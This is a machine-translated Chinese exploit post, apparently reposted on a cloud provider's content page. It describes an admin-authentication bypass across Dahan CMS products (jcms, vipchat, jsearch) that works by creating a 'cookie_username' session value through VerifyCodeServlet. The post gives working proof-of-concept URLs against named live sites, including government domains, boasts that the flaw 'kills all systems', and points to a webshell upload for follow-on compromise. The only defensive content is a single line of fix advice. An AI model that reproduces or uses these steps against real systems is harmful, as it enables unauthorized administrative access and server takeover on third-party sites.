Dahan network kills all systems and versions on 0day

Source: Internet
Author: User

Dahan network kills all systems and versions on 0day

Management Background Permission Bypass, easy GetShell after entering the background,
Experience proves to kill all systems and versions, including jcms, jact, jsearch, vipchat, vc, and xxgk.
I guess this is the most influential vulnerability in Dahan. Please try again!

Session Permission Bypass in the Setup directory:
 

Code Analysis/jcms/setup/opr_licenceinfo.jsp: // obtain the value of cookie_username in the Session and assign it to strUser String strUser = (String) sessions. getAttribute ("cookie_username"); // determines whether the strUser value is null? If (strUser = null | strUser. trim (). length () = 0) {out. println ('log on first! ') Return;} // if it is null, It is not logged on. return directly // if it is not null, it indicates it has been logged on


Reverse java servlet code/VerifyCodeServlet
 

// Obtain the request parameter var and assign it to strVar String strVar = Convert. getParameter (request, "var", ""); if (strVar = null) {request. getSession (). setAttribute ("COMPLAT", str_code); // Save the random code to the SESSION} else {// If strVar is not empty, create a request for the SESSION value named strVar. getSession (). setAttribute (strVar, str_code); // Save the random code to the SESSION}. Therefore, you can control the creation of the SESSION name through the var parameter.


Through the analysis of two programs, sort out:

1. opr_licenceinfo.jsp requires a SESSION cookie_username not empty to successfully log on.

2./VerifyCodeServlet can create any SESSION key value

Therefore, in combination, you can construct a successful logon.

Log on to opr_licenceinfo.jsp directly.

Http://www.zgzhijiang.gov.cn/jcms/setup/opr_licenceinfo.jsp
 

Add a Session value cookie_username

Http://www.zgzhijiang.gov.cn/jcms/VerifyCodeServlet? Var = cookie_username
 

Access/jcms/setup/opr_licenceinfo.jsp again and log on successfully.
 


Licence File Upload webshell vulnerability, do not demonstrate, refer to: http://wooyun.org/bugs/wooyun-2010-052699

POC chat POC:

Http://sdds.gov.cn/vipchat/setup/

Http://sdds.gov.cn/vipchat/VerifyCodeServlet? Var = cookie_username

Http://sdds.gov.cn/vipchat/setup/admin.jsp
 


Jsearch POC:

Http://www.hyhjbh.com/jsearch/setup/

Http://www.hyhjbh.com/jsearch/VerifyCodeServlet? Var = cookie_username

Http://www.hyhjbh.com/jsearch/setup/opr_licenceinfo.jsp
 


Other Chinese systems are not listed one by one,

This is a logic vulnerability of the VerifyCodeServlet component,

All systems of Dahan include VerifyCodeServlet, which is used to generate verification codes,

Therefore, all systems are blocked and the impact scope is very wide.

Note:

1. Some sites access the setup directory, and 403 is returned. Access is forbidden.

2. The new Chinese Version 2015 will not be affected.
 

Solution:

Fix VerifyCodeServlet component logic.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.